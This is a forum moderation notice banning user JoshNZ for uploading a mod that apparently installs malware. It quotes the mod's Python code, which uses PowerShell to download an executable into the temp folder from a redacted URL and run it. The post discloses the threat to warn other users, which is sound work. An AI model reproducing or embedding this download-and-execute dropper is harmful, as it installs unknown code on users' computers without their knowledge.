Jump to content

JoshNZ - BANNED


Recommended Posts

JoshNZ banned.

 

 

 

Reason:

Upload a misleading file that appears to install a virus (or at the very least a suspicious EXE) on the user's system.

 

Python source from the mod

import subprocess
from os import path

pa = path.expandvars('%TEMP%\dasadsasd.exe') 
subprocess.Popen(f'powershell Invoke-WebRequest -OutFile {pa} -Uri {{REDACTED MALICIOUS URL}}')
subprocess.call(pa)

 

Reference post

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...